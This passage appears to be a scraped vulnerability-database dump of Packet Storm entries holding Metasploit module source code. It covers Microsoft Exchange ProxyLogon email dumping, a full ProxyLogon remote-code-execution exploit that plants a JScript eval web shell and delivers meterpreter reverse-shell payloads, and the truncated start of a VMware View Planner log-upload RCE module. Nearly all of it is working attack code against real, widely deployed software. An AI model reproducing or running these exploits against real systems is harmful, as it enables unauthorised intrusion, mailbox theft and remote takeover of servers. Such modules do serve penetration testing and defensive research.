\n \nAll components are vulnerable by default. 
\n}, \n'Author' => [ \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise) \n], \n'References' => [ \n['CVE', '2021-26855'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'], \n['URL', 'http://aka.ms/exchangevulns'] \n], \n'DisclosureDate' => '2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'The email account that you want to dump']), \nOptString.new('FOLDER', [true, 'The email folder that you want to dump', 'inbox']), \nOptString.new('SERVER_NAME', [true, 'The name of the secondary internal Exchange server targeted']) \n]) \n \nregister_advanced_options([ \nOptInt.new('MaxEntries', [false, 'Override the maximum number of objects to dump', 512]) \n]) \nend \n \nXMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze \n \ndef grab_contacts \nresponse = send_xml(soap_findcontacts) \nxml = Nokogiri::XML.parse(response.body) \n \ndata = xml.xpath('//t:Contact', XMLNS) \nif data.empty? \nprint_status(' - the user has no contacts') \nelse \nwrite_loot(data.to_s) \nend \nend \n \ndef grab_emails(total_count) \n# get the email list of the target folder. \nresponse = send_xml(soap_maillist(total_count)) \nxml = Nokogiri::XML.parse(response.body) \n \n# iterate over the list to download the emails. 
\nxml.xpath('//t:ItemId', XMLNS).each do |item| \nprint_status(\" - download item: #{item.values[1]}\") \nresponse = send_xml(soap_download(item.values[0], item.values[1])) \nxml = Nokogiri::XML.parse(response.body) \n \nmessage = xml.at_xpath('//t:MimeContent', XMLNS).content \nwrite_loot(Rex::Text.decode_base64(message)) \nend \nend \n \ndef send_xml(data) \nuri = normalize_uri('ecp', 'temp.js') \n \nreceived = send_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\", \n'ctype' => 'text/xml; charset=utf-8', \n'data' => data \n) \nfail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_download(id, change_key) \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetItem> \n<m:ItemShape> \n<t:BaseShape>IdOnly</t:BaseShape> \n<t:IncludeMimeContent>true</t:IncludeMimeContent> \n</m:ItemShape> \n<m:ItemIds> \n<t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" /> \n</m:ItemIds> \n</m:GetItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_findcontacts \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" /> 
\n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='contacts'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_mailnum \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>Default</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\"> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_maillist(max_entries) \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" /> \n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='#{datastore['FOLDER']}'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef write_loot(data) \nloot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '') \nprint_good(\" - file saved to 
#{loot_path}\") \nend \n \ndef run \n# get the informations about the targeted user account. \nresponse = send_xml(soap_mailnum) \nif response.body =~ /Success/ \nprint_status('Connection to the server is successful') \nprint_status(\" - selected account: #{datastore['EMAIL']}\\n\") \n \n# grab contacts. \nprint_status('Attempt to dump contacts list for this user') \ngrab_contacts \n \nprint_line \n \n# grab emails. \nprint_status('Attempt to dump emails for this user') \nxml = Nokogiri::XML.parse(response.body) \nfolder_id = xml.at_xpath('//t:FolderId', XMLNS).values \nprint_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\") \n \ntotal_count = xml.at_xpath('//t:TotalCount', XMLNS).content \nprint_status(\" - number of email found: #{total_count}\") \n \nif total_count.to_i > datastore['MaxEntries'] \nprint_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\") \ntotal_count = datastore['MaxEntries'].to_s \nend \ngrab_emails(total_count) \nend \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162736/msexchange-disclose.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T16:45:01", "description": "", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161938", "href": "https://packetstormsecurity.com/files/161938/Microsoft-Exchange-ProxyLogon-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::CmdStager \ninclude 
Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication, impersonating as the \nadmin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Dicovery (Officially acknowledged by MSRC) \n'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull) \n'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise) \n'print(\"\")', # https://www.o2oxy.cn/3169.html \n'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691 \n], \n'References' => [ \n['CVE', '2021-26855'], \n['CVE', '2021-27065'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'http://aka.ms/exchangevulns'], \n['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'], \n[ \n'URL', \n'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265' \n], \n['URL', 'https://www.o2oxy.cn/3169.html'], \n['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup'] \n], \n'DisclosureDate' => 
'2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon', \n'HttpClientTimeout' => 60, \n'RPORT' => 443, \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]) \n]) \n \nregister_advanced_options([ \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 
'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @random_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@random_inputname}=#{cmd}\" \n) \nend \n \ndef install_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \ninput_name = rand_text_alpha(4..8).to_s \nshell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\" \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nExternalUrl: shell.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => 
(exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \ninput_name \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef patch_sid(sid) \nar = sid.to_s.split('-') \nif ar[-1] != '500' \nsid = \"#{ar[0..6].join('-')}-500\" \nend \n \nsid \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef random_ssrf_id \n# https://en.wikipedia.org/wiki/2,147,483,647 (lol) \n# max. 2147483647 \nrand(1941962752..2147483647) \nend \n \ndef request_autodiscover(server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n\"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? 
\n \n[server, legacy_dn] \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(server_name, legacy_dn, server_id) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response.code == 200 \nsid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/ \n \nsid = response.body.match(sid_regex).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \ndef request_oab(server_name, sid, session, canary) \ndata = { \nfilter: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nSelectedView: '', \nSelectedVDirType: 'OAB' \n} \n}, \nsort: {} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: session, \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \n \nif response.code == 200 \ndata = JSON.parse(response.body) \ndata['d']['Output'].each do |oab| \nif oab['Server'].downcase == server_name.downcase \nreturn [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']] \nend \nend \nend \n \n[] \nend \n \ndef request_proxylogon(server_name, sid) \ndata = \"<r at=\\\"Negotiate\\\" 
ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\" \nsession_id = '' \ncanary = '' \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'text/xml; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \nif response.code == 241 \nsession_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \ncanary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ... \nend \n \n[session_id, canary] \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_26855 \n# request for internal server name. \nresponse = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\") \nif response.code != 500 || !response.headers.to_s.include?('X-FEServer') \nfail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found') \nend \n \nserver_name = response.headers['X-FEServer'] \nprint_status(\"Internal server name (#{server_name})\") \n \n# get informations by autodiscover request. \nprint_status(message('Sending autodiscover request')) \nserver_id, legacy_dn = request_autodiscover(server_name) \n \nprint_status(\"Server: #{server_id}\") \nprint_status(\"LegacyDN: #{legacy_dn}\") \n \n# get the user UID using mapi request. \nprint_status(message('Sending mapi request')) \nsid = request_mapi(server_name, legacy_dn, server_id) \nprint_status(\"SID: #{sid} (#{datastore['EMAIL']})\") \n \n# search oab \nsid, session, canary, oab_id = search_oab(server_name, sid) \n \n[server_name, sid, session, canary, oab_id] \nend \n \n# post-auth arbitrary file write. \ndef run_cve_2021_27065(session_info) \n# set external url (and set the payload). 
\nprint_status('Prepare the payload on the remote target') \ninput_name = install_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty? \n \n# reset the virtual directory (and write the payload). \nprint_status('Write the payload on the remote target') \nremote_file = write_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty? \n \n# wait a lot. \ni = 0 \nwhile i < datastore['MaxWaitLoop'] \nreceived = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(web_directory, remote_file) \n}) \nif received && (received.code == 200) \nbreak \nend \n \nprint_warning(\"Wait a lot (#{i})\") \nsleep 5 \ni += 1 \nend \nfail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302 \n \n[input_name, remote_file] \nend \n \ndef search_oab(server_name, sid) \n# request cookies (session and canary) \nprint_status(message('Sending ProxyLogon request')) \n \nprint_status('Try to get a good msExchCanary (by patching user SID method)') \nsession_id, canary = request_proxylogon(server_name, patch_sid(sid)) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \n \nif oab_id.nil? || oab_id.empty? \nprint_status('Try to get a good msExchCanary (without correcting the user SID)') \nsession_id, canary = request_proxylogon(server_name, sid) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \nend \n \nfail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty? \nfail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty? 
\nfail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty? \n \nprint_status(\"ASP.NET_SessionId: #{session_id}\") \nprint_status(\"msExchEcpCanary: #{canary}\") \nprint_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\") \n \nreturn [sid, session, canary, oab_id] \nend \n \ndef send_http(method, ssrf, opts = {}) \nssrf = \"X-BEResource=#{ssrf};\" \nif opts[:cookie] && !opts[:cookie].empty? \nopts[:cookie] = \"#{ssrf} #{opts[:cookie]}\" \nelse \nopts[:cookie] = ssrf.to_s \nend \n \nopts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil? \n \nrequest = { \n'method' => method, \n'uri' => @random_uri, \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype] \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL']}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \nweb_dir = datastore['IISWritePath'].gsub('\\\\', '/') \nelse \nweb_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nweb_dir \nend \n \ndef write_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \nremote_file = \"#{rand_text_alpha(4..8)}.aspx\" \nif datastore['UseAlternatePath'] \nremote_path = 
\"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nelse \nremote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nend \n \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nFilePathName: remote_path.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => (exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \nremote_file \nend \n \ndef exploit \n@proto = (ssl ? 
'https' : 'http') \n@random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\") \n \nprint_status(message('Attempt to exploit for CVE-2021-26855')) \nexploit_info = run_cve_2021_26855 \n \nprint_status(message('Attempt to exploit for CVE-2021-27065')) \nshell_info = run_cve_2021_27065(exploit_info) \n \n@random_inputname = shell_info[0] \n@random_filename = shell_info[1] \n \nprint_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nif datastore['UseAlternatePath'] \nremote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\" \nelse \nremote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\" \nend \nregister_files_for_cleanup(remote_file) \n \n# trigger powa! \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nresponse = execute_command(\"cmd /c #{payload.encoded}\") \n \nprint_warning('Dumping command output in response') \noutput = response.body.split('Name :')[0] \nif output.empty? 
\nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(output) \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161938/exchange_proxylogon_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T17:09:26", "description": "", "cvss3": {}, "published": "2021-03-19T00:00:00", "type": "packetstorm", "title": "VMware View Planner 4.6 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "PACKETSTORM:161879", "href": "https://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated log file upload within the \nlog_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 \nSecurity Patch 1. \n \nSuccessful exploitation will result in RCE as the apache user inside \nthe appacheServer Docker container. 
\n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and PoC \n'Grant Willcox' # Metasploit Module \n], \n'References' => [ \n['CVE', '2021-21978'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'], \n['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC \n], \n'DisclosureDate' => '2021-03-02', # Vendor advisory \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'python', \n'Targets' => [ \n[ \n'VMware View Planner 4.6.0', \n{ \n'Arch' => ARCH_PYTHON, \n'Type' => :linux_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 